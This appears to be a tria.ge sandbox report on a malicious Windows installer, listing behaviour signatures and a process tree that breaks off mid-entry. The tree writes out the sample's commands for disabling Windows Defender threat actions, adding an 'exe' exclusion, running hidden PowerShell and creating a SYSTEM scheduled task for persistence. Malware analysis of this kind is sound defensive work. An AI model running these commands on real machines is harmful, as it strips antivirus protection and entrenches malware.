Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    167s
  • max time network
    302s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    08/08/2024, 22:34

General

  • Target

    34aff178d21a0542f60d2ae05d69708193f9818cf8834dd77141b8293c2d07cd.exe

  • Size

    7.2MB

  • MD5

    fd9ceab2c4254128dfbee913354685f7

  • SHA1

    31c6c5718e226470787f5d5bc964cd7b8eadc10f

  • SHA256

    34aff178d21a0542f60d2ae05d69708193f9818cf8834dd77141b8293c2d07cd

  • SHA512

    934bbf440bd1d55d0a0dfdf5c7bc1e45b4522cd5107495b99c779c8856470bdf3aa0fa3e41891a4c8fbc93b0736665fa969ad89ee6afc0555f7efb05c73f66bc

  • SSDEEP

    196608:91OFkdXH2JrgNYN+/xFfj2JWjmkU1rlAmXdr:3O2dXGMqNWfjwkU1BAAr

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 17 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 35 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 58 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\34aff178d21a0542f60d2ae05d69708193f9818cf8834dd77141b8293c2d07cd.exe
    "C:\Users\Admin\AppData\Local\Temp\34aff178d21a0542f60d2ae05d69708193f9818cf8834dd77141b8293c2d07cd.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3936
    • C:\Users\Admin\AppData\Local\Temp\7zS6987.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3164
      • C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install.exe
        .\Install.exe /qdidWd "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:4120
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4792
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:3676
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2064
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                PID:240
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:4980
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3288
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                7⤵
                  PID:216
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:4556
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2948
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  7⤵
                    PID:4920
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                5⤵
                • Indirect Command Execution
                • Suspicious use of WriteProcessMemory
                PID:3924
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:164
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    7⤵
                      PID:1244
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  5⤵
                  • Indirect Command Execution
                  • Suspicious use of WriteProcessMemory
                  PID:3668
                  • C:\Windows\SysWOW64\cmd.exe
                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                    6⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:2224
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                      7⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4568
                      • C:\Windows\SysWOW64\gpupdate.exe
                        "C:\Windows\system32\gpupdate.exe" /force
                        8⤵
                          PID:5012
                • C:\Windows\SysWOW64\forfiles.exe
                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                  4⤵
                  • Indirect Command Execution
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:424
                  • C:\Windows\SysWOW64\cmd.exe
                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:616
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      6⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:828
                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        7⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3276
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "bJaUjLwxLUDwMvBjjy" /SC once /ST 22:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install.exe\" rv /edidPx 525403 /S" /V1 /F
                  4⤵
                  • Drops file in Windows directory
                  • Scheduled Task/Job: Scheduled Task
                  PID:2320
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 924
                  4⤵
                  • Program crash
                  PID:1724
          • C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install.exe
            C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install.exe rv /edidPx 525403 /S
            1⤵
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Modifies data under HKEY_USERS
            PID:4012
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
              2⤵
                PID:236
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                  3⤵
                  • Indirect Command Execution
                  PID:4912
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:4300
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                      5⤵
                        PID:4940
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                    3⤵
                    • Indirect Command Execution
                    PID:220
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:4648
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:4868
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                    3⤵
                    • Indirect Command Execution
                    • System Location Discovery: System Language Discovery
                    PID:1428
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:672
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                        5⤵
                          PID:4452
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                      3⤵
                      • Indirect Command Execution
                      PID:4328
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:1108
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                          5⤵
                            PID:4320
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                        3⤵
                        • Indirect Command Execution
                        • System Location Discovery: System Language Discovery
                        PID:3944
                        • C:\Windows\SysWOW64\cmd.exe
                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:4008
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4308
                            • C:\Windows\SysWOW64\gpupdate.exe
                              "C:\Windows\system32\gpupdate.exe" /force
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:4128
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                      2⤵
                      • Drops file in System32 directory
                      • System Location Discovery: System Language Discovery
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:216
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1308
                        • C:\Windows\SysWOW64\reg.exe
                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:3808
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                        3⤵
                          PID:3580
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:3600
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1376
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                          3⤵
                            PID:3700
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1972
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                            3⤵
                              PID:4448
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:4876
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:3172
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                3⤵
                                  PID:2756
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                  3⤵
                                    PID:4860
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                    3⤵
                                      PID:1476
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1032
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:4896
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:4548
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4792
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:64
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:1408
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1852
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                            3⤵
                                              PID:656
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:3280
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1696
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:4388
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:1260
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:3276
                                              • C:\Windows\SysWOW64\reg.exe
